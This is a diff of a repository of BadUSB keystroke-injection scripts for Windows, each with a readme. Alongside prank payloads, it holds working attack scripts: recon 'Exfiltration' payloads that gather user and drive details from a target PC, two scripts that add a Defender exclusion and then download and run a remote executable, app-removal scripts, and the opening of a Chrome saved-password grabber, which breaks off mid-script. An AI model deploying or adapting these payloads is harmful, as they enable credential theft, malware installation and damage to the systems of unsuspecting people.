     38 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
     39 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md
     1 +
     2 +# USB_And_Harddrive_Information
     3 +Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change the path of the file "-DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- get hardware info
     16 +- save infos to a file
     17 +
     18 +
     19 +## Feedback
     20 +
     21 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +## Support
     29 +
     30 +For support, contact me via Discord "UNC0V3R3D#8662".
     31 +
     32 +
     33 +## Meta
     34 +
     35 +
     36 +- If you want to sponsor me on Patreon, the link is on my profile.
     37 +
     38 +
     39 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Info about the current Win-User.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>";$Report = $Report + "</div>";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
     19 +ENTER
     20 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
     21 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md
     1 +
     2 +# Win_User_Info
     3 +Saves some general Info about the current Win-User and stores it to a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change the path of the file "C:\PATH TO SAVE HERE\FILEresults-57059022.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- get win user info
     16 +- save info to a file
     17 +
     18 +
     19 +## Feedback
     20 +
     21 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +## Support
     29 +
     30 +For support, contact me via Discord "UNC0V3R3D#8662".
     31 +
     32 +
     33 +## Meta
     34 +
     35 +
     36 +- If you want to sponsor me on Patreon, the link is on my profile.
     37 +
     38 +
     39 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt
     1 +REM Author: AGO061
     2 +REM Description: AmongUs takes over the PC!!!
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/badusb-payloads/releases/download/SUS-R1/sus.exe';$file='sus.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
     19 +ENTER
     20 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md
     1 +
     2 +# JustAmongUs
     3 +Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- download sus.exe
     13 +- run sus.exe
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt
     1 +REM Title: Rick-Roll BSOD
     2 +REM Author: FalsePhilosopher + AGO061
     3 +REM Target: Win 10+, exe is Windows 7 and up 32/64 bit
     4 +REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes, AGO061 for making the rickroll version
     5 +REM Version: 1.0
     6 +REM Category: Prank
     7 +REM Display a video of a rick rolll, the video glitches and explodes and invokes a BSOD.
     8 +DELAY 400
     9 +GUI r
     10 +DELAY 500
     11 +STRING powershell Start-Process powershell -Verb runAs
     12 +CTRL-SHIFT ENTER
     13 +DELAY 850
     14 +SHIFT TAB
     15 +DELAY 500
     16 +ENTER
     17 +DELAY 1000
     18 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     19 +ENTER
     20 +DELAY 500
     21 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/rickroll-bsod/releases/download/first-version/rick_dist.exe';$file='rick_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
     22 +ENTER
     23 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md
     1 +
     2 +# RickRoll_IntoBSOD
     3 +Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- download rick_dist.exe
     13 +- run rick_dist.exe
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt
     1 +REM ---------CARTMAN SPAM----------
     2 +REM -- by Mr-Savag3 --- 09162022 --
     3 +REM -- updated to 1 line by -------
     4 +REM ---------------- I Am Jakoby --
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 600
     8 +STRING powershell -w h $k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $k;$i++){$o.SendKeys([char] 175)}; 1..10|foreach {saps https://www.youtube.com/watch?v=U3sAkAWfxLY;sleep 1;$o.SendKeys('f')}
     9 +ENTER
     10 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Cartman/readme.md
     1 +
     2 +# Cartman
     3 +Opens a weird cartman clip on youtube and turns the volume up to 100%.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open youtube video
     13 +- turn volume up
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Makes the computer speak
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +STRING powershell.exe -nop -win hidden -c "Add-Type -AssemblyName System.speech; $synth = New-Object System.Speech.Synthesis.SpeechSynthesizer; $synth.Speak('Hello you behind the Screen, I am inside your PC.')"
     6 +DELAY 100
     7 +ENTER
     8 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md
     1 +
     2 +# ComputerTalks
     3 +Makes the computer speak.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change the text if you WANT to "$synth.Speak('Hello you behind the Screen, I am inside your PC.')""
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- use system.speech to talk
     16 +
     17 +
     18 +## Feedback
     19 +
     20 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Support
     28 +
     29 +For support, contact me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +## Meta
     33 +
     34 +
     35 +- If you want to sponsor me on Patreon, the link is on my profile.
     36 +
     37 +
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt
     1 +REM Author: overwraith
     2 +REM Description: Opens a few Tabs...
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1200
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
     9 +DELAY 500
     10 +ENTER
     11 +DELAY 750
     12 +STRING DEL /Q MobileTabs.vbs
     13 +ENTER
     14 +STRING copy con MobileTabs.vbs
     15 +ENTER
     16 +STRING on error resume next
     17 +ENTER
     18 +STRING navOpenInBackgroundTab = &h1000
     19 +ENTER
     20 +STRING set oIE = CreateObject("InternetExplorer.Application")
     21 +ENTER
     22 +STRING Set args = WScript.Arguments
     23 +ENTER
     24 +STRING oIE.Navigate2 args.Item(0)
     25 +ENTER
     26 +STRING for intx = 1 to args.count
     27 +ENTER
     28 +STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
     29 +ENTER
     30 +STRING next
     31 +ENTER
     32 +STRING oIE.Visible = true
     33 +ENTER
     34 +CONTROL z
     35 +ENTER
     36 +STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
     37 +ENTER
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md
     1 +
     2 +# Destroy_Pc_with_tabs
     3 +Opens a few tabs... maybe too many.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- use system.speech to talk
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Bluescreen and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md
     1 +
     2 +# FakeBluescreen
     3 +Opens a website that has a fake BSOD and maximizes the window.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open website
     13 +- maximize window
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Update and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md
     1 +
     2 +# FakeUpdateWindows
     3 +Opens a website that has a fake windows update and maximizes the window.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open website
     13 +- maximize window
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Virus and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/wnc/
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/FakeVirus/readme.md
     1 +
     2 +# FakeVirus
     3 +Opens a Website with an fake Virus and setting it to fullscreen.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open website
     13 +- maximize window
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: There'll be the matrix rain in the cmd
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 100
     8 +STRING notepad
     9 +ENTER
     10 +DELAY 100
     11 +STRING @echo off
     12 +ENTER
     13 +ENTER
     14 +DELAY 100
     15 +STRING color 02
     16 +ENTER
     17 +ENTER
     18 +DELAY 100
     19 +STRING mode 1000
     20 +ENTER
     21 +ENTER
     22 +DELAY 100
     23 +STRING :matrixbynima
     24 +ENTER
     25 +ENTER
     26 +DELAY 100
     27 +STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
     28 +ENTER
     29 +ENTER
     30 +DELAY 100
     31 +STRING goto matrixbynima
     32 +ENTER
     33 +DELAY 100
     34 +CTRL S
     35 +DELAY 200
     36 +REM change %userprofile% to your user or the devices user that your using this on
     37 +STRING %userprofile%\Desktop\matrix.bat
     38 +ENTER
     39 +DELAY 1000
     40 +GUI r
     41 +DELAY 100
     42 +STRING cmd
     43 +ENTER
     44 +DELAY 100
     45 +STRING cd %userprofile%\Desktop\
     46 +ENTER
     47 +DELAY 50
     48 +STRING matrix.bat
     49 +ENTER
     50 +DELAY 1500
     51 +ENTER
     52 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md
     1 +
     2 +# Matrix_Rain_CMD
     3 +There'll be the matrix rain in the windows cmd.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open cmd
     13 +- write script
     14 +- maximize window
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Mutes windows audio...
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +DELAY 200
     10 +ENTER
     11 +DELAY 600
     12 +LEFTARROW
     13 +DELAY 300
     14 +ENTER
     15 +DELAY 450
     16 +STRING (new-object -com wscript.shell).SendKeys([char]173)
     17 +DELAY 200
     18 +ENTER
     19 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md
     1 +
     2 +# NoMoreSound
     3 +Mutes the windows audio.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- mute windows audio
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want.
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 2000
     6 +GUI r
     7 +DELAY 200
     8 +STRING winword
     9 +ENTER
     10 +DELAY 1000
     11 +ENTER
     12 +DELAY 200
     13 +ALT q
     14 +DELAY 300
     15 +STRING options spelling
     16 +DELAY 500
     17 +ENTER
     18 +DELAY 200
     19 +TAB
     20 +DELAY 200
     21 +ENTER
     22 +DELAY 200
     23 +STRING and
     24 +DELAY 200
     25 +TAB
     26 +STRING nad
     27 +DELAY 200
     28 +ALT a
     29 +DELAY 200
     30 +ENTER
     31 +DELAY 200
     32 +SHIFT TAB
     33 +DELAY 200
     34 +ENTER
     35 +DELAY 200
     36 +ALT F4
     37 +DELAY 200
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/WordPrank/readme.md
     1 +
     2 +# WordPrank
     3 +Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to the following changes:
     8 +
     9 +- change first word "STRING and"
     10 +- change first word to anything you want "STRING nad"
     11 +
     12 +
     13 +## Features
     14 +
     15 +- open word
     16 +- change auto correction
     17 +
     18 +
     19 +## Feedback
     20 +
     21 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +## Support
     29 +
     30 +For support, contact me via Discord "UNC0V3R3D#8662".
     31 +
     32 +
     33 +## Meta
     34 +
     35 +
     36 +- If you want to sponsor me on Patreon, the link is on my profile.
     37 +
     38 +
     39 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/justdance/justdance.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work.
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 700
     6 +GUI r
     7 +DELAY 650
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +DELAY 650
     10 +ENTER
     11 +DELAY 650
     12 +LEFTARROW
     13 +DELAY 650
     14 +ENTER
     15 +DELAY 650
     16 +STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
     17 +DELAY 650
     18 +ENTER
     19 +DELAY 650
     20 +STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
     21 +DELAY 650
     22 +ENTER
     23 +DELAY 550
     24 +STRING Start-Process -WindowStyle Hidden "https://www.youtube.com/watch?v=7W9IOhk1-z4"
     25 +DELAY 500
     26 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/justdance/readme.md
     1 +
     2 +# justdance
     3 +Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open video
     13 +- turn up volume
     14 +- maximize window
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Microsoft Store
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Microsoft Store
     18 +STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
     21 +
     22 +
     23 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md
     1 +
     2 +# DeleteMicrosoftStore
     3 +This script will delete the Microsoft Store.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- remove MS store package
     14 +
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Windows Mail app.
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Windows Mail app
     18 +STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/ChromePasswords.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Grabs saved Passwords from Chrome
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DELAY 5000
     6 +GUI r
     7 +DELAY 250
     8 +STRING powershell
     9 +ENTER
     10 +DELAY 2500
     11 +STRING pwsh
     12 +ENTER
     13 +DELAY 2500
     14 +STRING $d=Add-Type -A System.Security
     15 +ENTER
     16 +STRING $p='public static'
     17 +ENTER
     18 +STRING $g=""")]$p extern"
     19 +ENTER
     20 +STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
     21 +ENTER
     22 +STRING $m="[MarshalAs(UnmanagedType.LP"
     23 +ENTER
     24 +STRING $q='(s,i)'
     25 +ENTER
     26 +STRING $f='(p s,int i)'
     27 +ENTER
     28 +STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
     29 +ENTER
     30 +STRING $u=[Security.Cryptography.ProtectedData]
     31 +ENTER
